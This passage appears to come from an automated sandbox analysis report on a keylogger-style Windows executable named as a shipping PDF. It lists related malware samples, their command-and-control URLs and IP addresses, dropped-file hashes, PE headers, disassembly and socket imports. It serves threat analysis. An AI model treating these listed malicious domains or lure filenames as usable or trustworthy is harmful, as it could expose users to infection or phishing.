                                                                                            Crack2025.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              104.21.112.1#$43557.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.nolae-eu.shop/11jg/
                                                                                              BID_TERMS.EXE.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.meshki-co-uk.shop/mzlg/
                                                                                              SfF8tFQ11f.exeGet hashmaliciousUnknownBrowse
                                                                                              • cpvnxker.xyz/headimage.jpg
                                                                                              Urgent Purchase Order.vbeGet hashmaliciousFormBookBrowse
                                                                                              • www.rbopisalive.cyou/6m32/
                                                                                              CQDNwLUdY4.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.rbopisalive.cyou/2dxw/
                                                                                              sY8Sfsplzf.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.enoughmoney.online/z9gb/?TF-P7=zR3cIyonFbUCfX4wpKNWKHtg5/zg1+YcnXRNJ+yYPjA6661hsBw23FkDfEgtp7rlWUxdaFu+U4x0i75BG7d41DR1Eot6cYC6DrNKmQYa+SmymwWTrA==&Pv5=thT0rvC
                                                                                              gbdXRnNKkm.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.rbopisalive.cyou/a669/
                                                                                              JOB NO. AIQ8478.bat.exeGet hashmaliciousLokibotBrowse
                                                                                              • touxzw.ir/sccc/five/fre.php
                                                                                              jzqc1V4NqB.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.rbopisalive.cyou/a669/?WBuDj=rwARXV5iz9NY7lD2nse3mpYvX8mI8lq4kwoE5vm7VO31wBaqesAJuHozl9YZ6Ede+IkifZaE/LHkIUXetab9qlITGUdXxZLx5IMa8uxv5i9osOS22A==&Jzwht=FNiD
                                                                                              CP07E1clp1.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.fz977.xyz/406r/
                                                                                              132.226.247.73BANK SLIP-CTM PDA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              BOM N012-001 231109.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              iCgb4kAWFh.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              QUOTATION_MARQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              SHIPPING DOCS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              SOA FEB 2025.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              DON.ps1Get hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              INV000001203.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              Statement FEB 2025pdf.com.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              reallyfreegeoip.orgHSBC01703025_PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 104.21.96.1
                                                                                              BANK SLIP-CTM PDA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.32.1
                                                                                              QUOTATION#0033546.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 104.21.16.1
                                                                                              Teklif Talebi #U0130hale No-14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 104.21.96.1
                                                                                              BOM N012-001 231109.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 104.21.80.1
                                                                                              Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 104.21.64.1
                                                                                              PT Inquiry.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.32.1
                                                                                              DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 104.21.32.1
                                                                                              shipment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 104.21.112.1
                                                                                              order confirmation.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.16.1
                                                                                              api.telegram.orgsryxen-built.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              HSBC01703025_PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              QUOTATION#0033546.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              Teklif Talebi #U0130hale No-14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              BOM N012-001 231109.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              shipment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              SpotifyStartupTask.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              • 149.154.167.220
                                                                                              Crack2025.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              • 149.154.167.220
                                                                                              checkip.dyndns.comHSBC01703025_PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 132.226.8.169
                                                                                              BANK SLIP-CTM PDA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              QUOTATION#0033546.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 158.101.44.242
                                                                                              Teklif Talebi #U0130hale No-14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 158.101.44.242
                                                                                              BOM N012-001 231109.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 193.122.6.168
                                                                                              PT Inquiry.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 193.122.130.0
                                                                                              DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 132.226.8.169
                                                                                              shipment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 132.226.8.169
                                                                                              order confirmation.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 158.101.44.242
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              TELEGRAMRUsryxen-built.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              HSBC01703025_PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              QUOTATION#0033546.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              Teklif Talebi #U0130hale No-14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              BOM N012-001 231109.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              shipment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 149.154.167.99
                                                                                              SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 149.154.167.99
                                                                                              UTMEMUSHSBC01703025_PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 132.226.8.169
                                                                                              BANK SLIP-CTM PDA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              BOM N012-001 231109.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 132.226.8.169
                                                                                              shipment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 132.226.8.169
                                                                                              CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                              • 132.226.8.169
                                                                                              CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                              • 132.226.8.169
                                                                                              CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                              • 132.226.8.169
                                                                                              iCgb4kAWFh.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                              • 132.226.247.73
                                                                                              CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                              • 132.226.247.73
                                                                                              CLOUDFLARENETUSCloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                              • 104.21.64.1
                                                                                              XClient.exeGet hashmaliciousXWormBrowse
                                                                                              • 104.20.4.235
                                                                                              https://nwsyork.lamboi.xyz/HnBTHlrQ#parts@foster-uk.comGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                              • 104.16.6.189
                                                                                              https://www.swpinovalab.com.br/admin/ees.phpGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.16.123.96
                                                                                              WizClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                              • 104.20.3.235
                                                                                              #$43557.exeGet hashmaliciousFormBookBrowse
                                                                                              • 104.21.112.1
                                                                                              Invoice 1425004091.exeGet hashmaliciousFormBookBrowse
                                                                                              • 188.114.97.3
                                                                                              DHL_AWB#907853880911.exeGet hashmaliciousFormBookBrowse
                                                                                              • 104.21.45.179
                                                                                              HSBC01703025_PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 104.21.96.1
                                                                                              BANK SLIP-CTM PDA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.32.1
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              05af1f5ca1b87cc9cc9b25185115607dINV000001203.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 104.21.112.1
                                                                                              QUOTATION_MARQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                              • 104.21.112.1
                                                                                              QUOTATION_FEBQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                              • 104.21.112.1
                                                                                              QUOTATION_FEBQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                              • 104.21.112.1
                                                                                              akXjj2a58b.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 104.21.112.1
                                                                                              QUOTATION_JANQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                              • 104.21.112.1
                                                                                              VV9lrCk7LE.BATGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                              • 104.21.112.1
                                                                                              CUST543324_invoice.pdf.scrGet hashmaliciousMassLogger RATBrowse
                                                                                              • 104.21.112.1
                                                                                              QUOTATION_JANQUOTE312025#U00faPDF.scrGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.112.1
                                                                                              24602711 OR Invoice.pdf.scrGet hashmaliciousMassLogger RATBrowse
                                                                                              • 104.21.112.1
                                                                                              36f7277af969a6947a61ae0b815907a1INV000001203.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              akXjj2a58b.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              1cRfGAFurK.vbsGet hashmaliciousRemcos, GuLoader, MailPassViewBrowse
                                                                                              • 149.154.167.220
                                                                                              Sample.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                              • 149.154.167.220
                                                                                              invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                              • 149.154.167.220
                                                                                              Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              2024-HRDCL-0000796.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              2024-HRDCL-0000796.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              DHL Shipment DOCs_002.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              No context
                                                                                              Process:C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):93696
                                                                                              Entropy (8bit):6.914527220484985
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:kZ9NWJT5fkWG9CKDkqTdCXzkDfiCKzMeb45fwUjwkvvU+aT8rIjnPg4ujeOkk:kZXWJ9ZNMdUDURWzk51vcOkPg4+eq
                                                                                              MD5:21C7393E0CEB68F93247A94F120D159C
                                                                                              SHA1:9D5E4FFBB467FB223EC92F8828C149BD4F94C1C5
                                                                                              SHA-256:69A3507E33BEF2B15CBD9CFE604D1A040D24B41EAD1D20C7FE6E272FAC2E3F57
                                                                                              SHA-512:42116223605AB76376719F84847D91E89E5DD0FC8F797A1C565D3F6478AD764FCCCD02D239DC2FE2CF232542E440B02660D8B8B172C11B95B9DCE18152E80AAF
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:tk.T@75BJ3ZD..BS.U0M13GB.EK91UTC75BN3ZDWLBSNU0M13GBQEK91UTC7.BN3T[.BB.G...0..c.-"J.%&,PG##.9%9"-'n7UmCF)b8+k}~.t.XQ'`>WNsLBSNU0MavGB.DH9.;..75BN3ZDW.BQO^1.13#CQEC91UTC7K.O3ZdWLB.OU0Mq3GbQEK;1UPC75BN3ZBWLBSNU0M.2GBSEK91UTA7U.N3JDW\BSNU M1#GBQEK9!UTC75BN3ZDWd.RN.0M13.CQ.N91UTC75BN3ZDWLBSNU0.03KBQEK91UTC75BN3ZDWLBSNU0M13GBQEK91UTC75BN3ZDWLBSNU0M1.GBYEK91UTC75BN;zDW.BSNU0M13GBQk?\I!TC7. O3ZdWLB7OU0O13GBQEK91UTC75bN3:j%?00NU0.43GB.DK97UTCQ4BN3ZDWLBSNU0Mq3G..7.U^6TC;5BN3.EWL@SNU\L13GBQEK91UTC7uBNqZDWLBSNU0M13GBQE+.0UTC75.N3ZFWIB..U0..3GAQEKc1UR..5B.3ZDWLBSNU0M13GBQEK91UTC75BN3ZDWLBSNU0M13GBQ.6.>..^F.3ZDWLBRLV4K9;GBQEK91U*C75.N3Z.WLBdNU0h13G/QEK.1UT=75B03ZD3LBS<U0MP3GB.EK9^UTCY5BNMZDWR@{QU0G..G@yeK9;U~.D.BN9.EWLF lU0G.1GBU6h91_.@75F=.ZD].FSNQCh13M.TEK=..T@.#DN3A+oLBYNV.X73GY{cK;.lTC=5hh3Y.BJBSU..M3.NBQAaoBHTC1..N3P0^LBQ._0M5.Y@y.K9;.v=$5BJ.Znu2VSNQ.M..9WQEO.1.v=!5BJ.Znu2USNQ.M.5m Q7.51%W,V5BH..DWFj.NU6M..G<_EK=3:.C7?dd.Zl.LBUN}fM15Gj.EK?1}.C73BffZDQLhiN}`M15Gj.EK?1..CI.BN7vC).BSJ~&3.3GF.C39
                                                                                              Process:C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):69206
                                                                                              Entropy (8bit):7.923910436166648
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:8tIkrTIBniMh03U7gKsqv+2cOm6O1TACd8pL2kWyyizdDm4:8VTIRiMh0ssqv+bOm6O1TACd8psbUDm4
                                                                                              MD5:1A8D92684921C0F01E8A7D37852EA386
                                                                                              SHA1:C677F5828F61D44F02BB2A36615555DB4723233E
                                                                                              SHA-256:C32FC74BFBF2E98D049DD92B28E05C7DFE07B2F788051D05B50F45FD116DA8FA
                                                                                              SHA-512:1B4BFF6FD955852F330887E58CBAF95979FA654E1D4AB5C8F9BA1B07D5C0B54378276CA9369832E9A7250D26450AFA091B91023E7BE0CD09D2FE015FC3C38F20
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:EA06..n..Z..J..kB.L.TMF.S.Uf...B..is..V.C..)..e^.B....Q.....l.V..*......f..U..-.R.2Y4..G...s.,.E-...[m..).N%v....t.V*2{...N..(..v...JD..;.|..5..Ti..vc3...4Z..f)|.|.d..>t..b.3..!...P......]....S....oU..t.%^..6.).....$ ...p*T.0....pt..?..0...<.......Q:=...7...W...v.?.Rd .f.@......O.Q.lT...%..&....h.6|h.....l....>.........R.;..sTZ.2..6W)..?..N..^.r.......(.j.&...Uf....A.6,s..K...........qg.>..F..@..R.U.......R..b..lA... ..h.6%..dt.D..(...bf..O..J.....6+...d....(.*..U.Q.qZ=..e.X*..m.)B.N{@.e.Al..63.=..6.Nf5....F...TJ.2.S.Th`..7.T...}R...).:...L.Vi.nubo3..ov:\.3l.P.[E.gY.P.T*.V.....t..F.a...J..;..L....2.Q.W...f.@...!...{$.E#..u.eV.l#t..FsW..i.)...!...T.o.[l..7..f2Z...5.R#..%^.j...jln.G.W.(....C...M.j...P....1...P*-..1..(sy...f.Q*4.E..}..........`.*t..C...U:U.M3.L..m}.g9......k..h.zE..N.........Q...5..E.G@!...B..lv. ......Z...R....o..>R.s)E..7..)T...h......gC.M@.H.^...l).%..u.T.....3..:7J\.k..P..p.......uViO...+..cW.U.SZ.2cY...y..M..gQp.Bw'.@.
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):6.858484049794402
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:Shipment Document BL,INV and packing list.pdf.exe
                                                                                              File size:971'776 bytes
                                                                                              MD5:5fd799c047c81a8efb15d9a32f1d8e39
                                                                                              SHA1:fe01653460b4435266a8d3a3bdab26def6a9b2f7
                                                                                              SHA256:ffac68d784d7cd99536b0664ff0a765371c8bf0d0836fce71fa8a29afa9cb5c3
                                                                                              SHA512:71e97cda9b0c205be029726c6c280afedcfacf92f324734945d622f2112e259f85b29cf6745455cca2aad39734257ac05cf43c6576c732d0ab3c2f7fd1fd79d0
                                                                                              SSDEEP:24576:xu6J33O0c+JY5UZ+XC0kGso6Fa5ZzQ5N8yWY:ju0c++OCvkGs9Fa55Q5qY
                                                                                              TLSH:0925AE2273DDC360CB669173BF69B7016EBF3C614630B85B2F980D7DA950162262D7A3
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                              Icon Hash:aaf3e3e3938382a0
                                                                                              Entrypoint:0x427dcd
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x67D76614 [Mon Mar 17 00:00:20 2025 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:5
                                                                                              OS Version Minor:1
                                                                                              File Version Major:5
                                                                                              File Version Minor:1
                                                                                              Subsystem Version Major:5
                                                                                              Subsystem Version Minor:1
                                                                                              Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                              Instruction
                                                                                              call 00007F256C7CD14Ah
                                                                                              jmp 00007F256C7BFF14h
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              push edi
                                                                                              push esi
                                                                                              mov esi, dword ptr [esp+10h]
                                                                                              mov ecx, dword ptr [esp+14h]
                                                                                              mov edi, dword ptr [esp+0Ch]
                                                                                              mov eax, ecx
                                                                                              mov edx, ecx
                                                                                              add eax, esi
                                                                                              cmp edi, esi
                                                                                              jbe 00007F256C7C009Ah
                                                                                              cmp edi, eax
                                                                                              jc 00007F256C7C03FEh
                                                                                              bt dword ptr [004C31FCh], 01h
                                                                                              jnc 00007F256C7C0099h
                                                                                              rep movsb
                                                                                              jmp 00007F256C7C03ACh
                                                                                              cmp ecx, 00000080h
                                                                                              jc 00007F256C7C0264h
                                                                                              mov eax, edi
                                                                                              xor eax, esi
                                                                                              test eax, 0000000Fh
                                                                                              jne 00007F256C7C00A0h
                                                                                              bt dword ptr [004BE324h], 01h
                                                                                              jc 00007F256C7C0570h
                                                                                              bt dword ptr [004C31FCh], 00000000h
                                                                                              jnc 00007F256C7C023Dh
                                                                                              test edi, 00000003h
                                                                                              jne 00007F256C7C024Eh
                                                                                              test esi, 00000003h
                                                                                              jne 00007F256C7C022Dh
                                                                                              bt edi, 02h
                                                                                              jnc 00007F256C7C009Fh
                                                                                              mov eax, dword ptr [esi]
                                                                                              sub ecx, 04h
                                                                                              lea esi, dword ptr [esi+04h]
                                                                                              mov dword ptr [edi], eax
                                                                                              lea edi, dword ptr [edi+04h]
                                                                                              bt edi, 03h
                                                                                              jnc 00007F256C7C00A3h
                                                                                              movq xmm1, qword ptr [esi]
                                                                                              sub ecx, 08h
                                                                                              lea esi, dword ptr [esi+08h]
                                                                                              movq qword ptr [edi], xmm1
                                                                                              lea edi, dword ptr [edi+08h]
                                                                                              test esi, 00000007h
                                                                                              je 00007F256C7C00F5h
                                                                                              bt esi, 03h
                                                                                              jnc 00007F256C7C0148h
                                                                                              Programming Language:
                                                                                              • [ASM] VS2013 build 21005
                                                                                              • [ C ] VS2013 build 21005
                                                                                              • [C++] VS2013 build 21005
                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                              • [ASM] VS2013 UPD4 build 31101
                                                                                              • [RES] VS2013 build 21005
                                                                                              • [LNK] VS2013 UPD4 build 31101
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x24b28.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xec0000x711c.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0xc70000x24b280x24c00d9fe10679bd9771d4e7edde00484457dFalse0.8208904655612245data7.6000179710571585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0xec0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                              RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                              RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                              RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                              RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                              RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                              RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                              RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                              RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                              RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                              RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                              RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                                              RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                              RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                                              RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                              RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                              RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                              RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                              RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                              RT_RCDATA0xcf7b80x1bdeddata1.000359154497753
                                                                                              RT_GROUP_ICON0xeb5a80x76dataEnglishGreat Britain0.6610169491525424
                                                                                              RT_GROUP_ICON0xeb6200x14dataEnglishGreat Britain1.25
                                                                                              RT_GROUP_ICON0xeb6340x14dataEnglishGreat Britain1.15
                                                                                              RT_GROUP_ICON0xeb6480x14dataEnglishGreat Britain1.25
                                                                                              RT_VERSION0xeb65c0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                              RT_MANIFEST0xeb7380x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                              DLLImport
                                                                                              WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
